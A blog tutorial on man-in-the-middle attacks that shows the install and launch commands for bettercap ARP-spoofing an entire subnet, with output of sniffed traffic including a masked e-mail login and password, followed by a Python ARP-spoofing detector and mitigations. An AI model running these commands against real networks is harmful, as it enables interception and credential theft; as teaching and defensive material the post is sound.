MiTM using Bettercap


Hello readers. I’ve been writing some courses for next year (Hacking 1, 2 and 3, among other courses) and, during a section about MiTM, I found the same usual tools such as Cain and Abel, Ettercap, and so on. Therefore, I’ve decided to change the context and take an easier way to perform the MiTM attack by using a new tool named “bettercap” (http://www.bettercap.org/). In my lab, bettercap ARP-spoofed all devices in the network (three computers and two phones) and I could make a big MiTM for all of them. 🙂

To use bettercap on Kali Linux we have to execute the following commands:

root@hacker2:~# git clone https://github.com/evilsocket/bettercap
root@hacker2:~# apt-get install ruby-dev libpcap-dev
root@hacker2:~# cd bettercap/
root@hacker2:~# gem clean bettercap.gemspec
root@hacker2:~# gem build bettercap.gemspec
root@hacker2:~# gem install bettercap*.gem
root@hacker2:~# bettercap -X -L -I eth0
[I] Targeting the whole subnet 192.168.1.0..192.168.1.255 …
[I] Network discovery thread started.
[I] Searching for alive targets …
[I] Getting gateway 192.168.1.1 MAC address …
WARNING: pinging broadcast address
[I] Gateway : 192.168.1.1 ( cc:b2:55:d0:16:54 )
[I] Local : 192.168.1.108 ( 00:0c:29:9e:dc:48 )
[I] Starting ARP spoofer …
[I] Starting sniffer …
[I] Collected 2 total targets.
[I] 192.168.1.100 : 48:5b:39:6c:29:7c ( Asustek Computer )
[I] 192.168.1.103 : 60:36:dd:03:ff:e3 ( Intel Corporate )
[W] Aquired 2 new targets.
[192.168.1.100:55867 > 199.16.158.8:443 TCP] [HTTPS] https://199.16.158.8/
[192.168.1.100:55986 > 208.84.244.144:80 TCP] [GET] http://mail.terra.com.br/globalSTATIC/fe/zaz-admanager/zaz-admanager.html
[192.168.1.100:55988 > 85.31.217.162:80 TCP] [GET] http://p.nxtck.com/an?a=2&cb=0.4494611646514386
[192.168.1.100:55988 > 85.31.217.162:80 TCP] [GET] http://p.nxtck.com/an?a=2&cb=0.4494611646514386
[192.168.1.103:9069 > 177.153.30.100:443 TCP] [HTTPS] https://177.153.30.100/
[192.168.1.103:9069 > 177.153.30.100:443 TCP] [HTTPS] https://177.153.30.100/
[192.168.1.103:9147 > 213.180.193.119:443 TCP] [HTTPS] https://mc.yandex.ru/    # SUSPECT CONNECTION
[192.168.1.103:9147 > 213.180.193.119:443 TCP] [HTTPS] https://mc.yandex.ru/    # SUSPECT CONNECTION
[186.202.140.222:110 > 192.168.1.101:32973 TCP] [FTP] +OK
CAPA
TOP
UIDL
RESP-CODES
PIPELINING
STLS
USER
SASL PLAIN LOGIN
.
[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] USER alex_sun@xxx.xxx
[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] USER alex_sun@xxx.xxx
[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] PASS XXXXX    # E-MAIL PASSWORD REVEALED
[192.168.1.101:32973 > 186.202.140.222:110 TCP] [FTP] PASS XXXXX    # E-MAIL PASSWORD REVEALED
……..

You should also test the -P option (to narrow the parsers to, for example, NTLMSS, MAIL, FTP, HTTPAUTH, and so on) and the --proxy option. 🙂
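The session above shows what a spoofed network looks like from the attacker's side: the local host (00:0c:29:9e:dc:48) starts answering ARP for the gateway and for the other hosts. The same picture is visible to a defender watching ARP replies on any host of the /24. The following is an added example, not code from this post or from bettercap: a small detector that keeps the first MAC seen for each IP and flags a changed gateway binding, a changed host binding, or one MAC claiming several IPs. The reply list is constructed from the addresses in the session, not captured.

```python
# Added example (not from the post or from bettercap): detect ARP cache
# poisoning from a stream of ARP replies, using the session's addresses.
from collections import defaultdict
from typing import NamedTuple


class ArpReply(NamedTuple):
    sender_ip: str   # IP address the reply claims to speak for
    sender_mac: str  # MAC address the reply attaches to that IP


def detect_arp_spoof(replies, gateway_ip):
    """Walk ARP replies in order and return a list of alert tuples.

    Two signals are checked:
      * an IP (the gateway above all) suddenly mapped to a new MAC, and
      * one MAC claiming more than one IP address on the segment.
    """
    bindings = {}                    # ip -> first MAC observed for it
    ips_per_mac = defaultdict(set)   # mac -> every IP it has claimed so far
    alerts = []
    for reply in replies:
        first_mac = bindings.setdefault(reply.sender_ip, reply.sender_mac)
        if first_mac != reply.sender_mac:
            kind = ("gateway-mac-changed" if reply.sender_ip == gateway_ip
                    else "ip-mac-changed")
            alerts.append((kind, reply.sender_ip, first_mac, reply.sender_mac))
        claimed = ips_per_mac[reply.sender_mac]
        if reply.sender_ip not in claimed:
            claimed.add(reply.sender_ip)
            if len(claimed) > 1:
                alerts.append(("mac-claims-multiple-ips", reply.sender_mac,
                               tuple(sorted(claimed))))
    return alerts


# Constructed sample: the legitimate bindings from the session, followed by
# the poisoned replies the attacking host (00:0c:29:9e:dc:48) would send.
SAMPLE_REPLIES = [
    ArpReply("192.168.1.1", "cc:b2:55:d0:16:54"),
    ArpReply("192.168.1.100", "48:5b:39:6c:29:7c"),
    ArpReply("192.168.1.103", "60:36:dd:03:ff:e3"),
    ArpReply("192.168.1.108", "00:0c:29:9e:dc:48"),
    ArpReply("192.168.1.1", "00:0c:29:9e:dc:48"),    # poses as the gateway
    ArpReply("192.168.1.100", "00:0c:29:9e:dc:48"),  # poses as a victim host
]

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES, "192.168.1.1"):
        print(alert)
```

On a real segment the same logic runs over replies pulled from a capture; a static ARP entry for the gateway, or dynamic ARP inspection on the switch, is the mitigation the alerts point to.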

Have a nice day and thanks for your attention.

Alexandre Borges

(Linkedin: http://www.linkedin.com/in/aleborges)
